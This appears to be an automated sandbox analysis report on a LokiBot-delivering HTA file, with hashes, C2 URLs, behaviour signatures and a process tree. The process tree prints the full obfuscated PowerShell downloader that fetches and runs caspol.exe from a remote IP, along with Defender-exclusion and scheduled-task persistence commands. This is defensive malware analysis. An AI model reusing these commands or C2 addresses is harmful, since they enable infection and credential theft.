Analysis
-
max time kernel
137s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-11-2024 17:41
Static task
static1
Behavioral task
behavioral1
Sample
givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta
Resource
win10v2004-20241007-en
General
-
Target
givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta
-
Size
178KB
-
MD5
e80a6dc30c45134e8c433ef07277022f
-
SHA1
9041ab7b0cf03e4c18f86ff32eac95c3ad06f462
-
SHA256
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182
-
SHA512
6156f6fcb24fedaabb7d1d62a0ff71e7bd8c6ab194c1a5c1b7ccc25644ba36dd62a79a8989dba98015044502a64db5c32187b802cc42dc964f25323c352519d8
-
SSDEEP
96:4vCl17nlkfktbLVe4I9qWs5cew1WyNk6O5Q:4vCldn+s9he4CqWj26O5Q
Malware Config
Extracted
lokibot
http://94.156.177.95/simple/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 13 3844 pOwersheLl.eXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4496 powershell.exe 3400 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 3844 pOwersheLl.eXe 3632 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation caspol.exe -
Executes dropped EXE 2 IoCs
pid Process 516 caspol.exe 3616 caspol.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 516 set thread context of 3616 516 caspol.exe 111 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOwersheLl.eXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caspol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4492 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3844 pOwersheLl.eXe 3844 pOwersheLl.eXe 3632 powershell.exe 3632 powershell.exe 4496 powershell.exe 3400 powershell.exe 4496 powershell.exe 3400 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3844 pOwersheLl.eXe Token: SeDebugPrivilege 3632 powershell.exe Token: SeDebugPrivilege 4496 powershell.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeDebugPrivilege 3616 caspol.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4884 wrote to memory of 3844 4884 mshta.exe 83 PID 4884 wrote to memory of 3844 4884 mshta.exe 83 PID 4884 wrote to memory of 3844 4884 mshta.exe 83 PID 3844 wrote to memory of 3632 3844 pOwersheLl.eXe 87 PID 3844 wrote to memory of 3632 3844 pOwersheLl.eXe 87 PID 3844 wrote to memory of 3632 3844 pOwersheLl.eXe 87 PID 3844 wrote to memory of 4108 3844 pOwersheLl.eXe 91 PID 3844 wrote to memory of 4108 3844 pOwersheLl.eXe 91 PID 3844 wrote to memory of 4108 3844 pOwersheLl.eXe 91 PID 4108 wrote to memory of 3332 4108 csc.exe 93 PID 4108 wrote to memory of 3332 4108 csc.exe 93 PID 4108 wrote to memory of 3332 4108 csc.exe 93 PID 3844 wrote to memory of 516 3844 pOwersheLl.eXe 97 PID 3844 wrote to memory of 516 3844 pOwersheLl.eXe 97 PID 3844 wrote to memory of 516 3844 pOwersheLl.eXe 97 PID 516 wrote to memory of 4496 516 caspol.exe 105 PID 516 wrote to memory of 4496 516 caspol.exe 105 PID 516 wrote to memory of 4496 516 caspol.exe 105 PID 516 wrote to memory of 3400 516 caspol.exe 107 PID 516 wrote to memory of 3400 516 caspol.exe 107 PID 516 wrote to memory of 3400 516 caspol.exe 107 PID 516 wrote to memory of 4492 516 caspol.exe 109 PID 516 wrote to memory of 4492 516 caspol.exe 109 PID 516 wrote to memory of 4492 516 caspol.exe 109 PID 516 wrote to memory of 3616 516 caspol.exe 111 PID 516 wrote to memory of 3616 516 caspol.exe 111 PID 516 wrote to memory of 3616 516 caspol.exe 111 PID 516 wrote to memory of 3616 516 caspol.exe 111 PID 516 wrote to memory of 3616 516 caspol.exe 111 PID 516 wrote to memory of 3616 516 caspol.exe 111 PID 516 wrote to memory of 3616 516 caspol.exe 111 PID 516 wrote to memory of 3616 516 caspol.exe 111 PID 516 wrote to memory of 3616 516 caspol.exe 111 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe"C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'JFo3VE02ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFckRFZmluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnJwdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGaUVJdnlPaGJJcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWVCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPZ2NBUnYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo3VE02OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjQzLjEzNi8zNy9jYXNwb2wuZXhlIiwiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUiLDAsMCk7c1RBUlQtc0xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjYXNwb2wuZXhlIg=='+[CHAr]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3632
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xth52laq\xth52laq.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC66D.tmp" "c:\Users\Admin\AppData\Local\Temp\xth52laq\CSC63C1D40E64504A10B5D821BB373F501D.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:3332
-
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp756A.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4492
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3616
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
344B
MD5de9c9636e5149ab78e79b684f926bd18
SHA1c2a9ec28eb1bb95cbb59908f5b5af21a1e6667d7
SHA2560ed90f5a3554ac83bb776696e38413c88b5da74489d583f0b87820f3c97e9781
SHA512a7de45a62d6f4744d44fe869db0f4c10b1d880b9ec3d75ec6f6eb2d1199878f78b8638e2ce92f35c5ca9d82a66396a0e5d2b06f83afddf13089b061ff0771174
-
Filesize
17KB
MD5e045109d9c3e2d7e9a4764ba7a3271d8
SHA164b73e619a0d32faf57fdec82f7ef6a3ec1fb15a
SHA2568643f0e89929d9942ff32630ecaf7dd1e2463e3e84812339fb98590d2f44cb4a
SHA512294f76e4ee3ead1f490ff10da6205351a63e3716c495417c85aa9ab1a6056190a8ede57211f350d5167bb8202ace6a23d6280748256f968c6c276e6529ae3d98
-
Filesize
1KB
MD59fca0f1355d643f32799547585883d09
SHA14d21acf2d72dcca12855b8c9d8824739c2107d7f
SHA256f3eaf61d8773cac8e0e3ac8ad9712e2947f1a1335eb6f5822fcec343c401386d
SHA512e047312325e4c39e210fda63dbce24622071af15984aa5f8e5a931951181db0277310a1b434e7276c2abdd4d7f00d6661de210474c23a82030614bce0bd7a67d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD594ab2a6063a659d594f083e5cd100baa
SHA1cea556bd8dde1f1b95afb31d556fe447428c431d
SHA256b98b47e9c9a064c4876ca262f645f317e60eb1e5fb68e1ff0e65ac3d98b9fcea
SHA5129e88df7dbe488b82f5d2d31d96052258ab7529a84df3d096c729b9519a96309945bf4bde6ce4948b2aaa55e4ae701bc9e034d826bd3b88dd1c28adccd088a1c0
-
Filesize
3KB
MD5f2222918de55ff725e59f71dc97b06fe
SHA112dd3c4946c5c2371f909e695de8a997c8e84bb0
SHA2568b2cdd2c713aa6cd20243ce4a6025824456093d78f1c461a1e4e2c007ed8248e
SHA512e93ed10f4025d2dcf4ea67f1e83771889d8b636e8963451bd57751da4d7765dd4cadf20910fc182764ee91306535ff12b65845a3a3a66729458302d7f0839e83
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-940901362-3608833189-1915618603-1000\0f5007522459c86e95ffcc62f32308f1_f2cdb6fb-4ab8-4547-9f25-fad1f7a44351
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-940901362-3608833189-1915618603-1000\0f5007522459c86e95ffcc62f32308f1_f2cdb6fb-4ab8-4547-9f25-fad1f7a44351
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
Filesize
568KB
MD5318ff90d7a2797a041b836f7f8900f62
SHA1fdda6afed7a1643ae353e7a635e6744c2b0a07d5
SHA256241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430
SHA512808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac
-
Filesize
652B
MD5c4ed556b65079a3930f70556acbecde1
SHA1d8ce6a2130e55719540f4c7fff34e436f37a6736
SHA25664af22b653860191344e1143193ac94c60377535f1f2fc0fe050d5019e316406
SHA512224da9e5c05d2670d01e30733347185028919dd9cb8d77730b0205b25c8570294b04a40d6a521d7d878717fda408cb6adc8d91dfe02907a3bbe0e9e5ddf5161c
-
Filesize
464B
MD5f8419bbc398e1a2b134eec88b333f8f6
SHA157ebba4cad00272da80b919df0908ec40f9be48a
SHA25625fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3
SHA512b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674
-
Filesize
369B
MD5ac479e66af8d2b3726d5304e128e2ca1
SHA1f68d985cdbe5208ee1897cd729c74649af16085c
SHA2562d4beb7fa3936cda1d97c2ec13b265bfcba027ad35b13b60340597526fe2fa6a
SHA512a2e4fcde4e12c54c18d1b9b1b247233a51e4babad733064972c3d56f5226469d7411345ec8b13c25e4420d72577d4b706bfd43081cdb89890ab27f4bfe42e978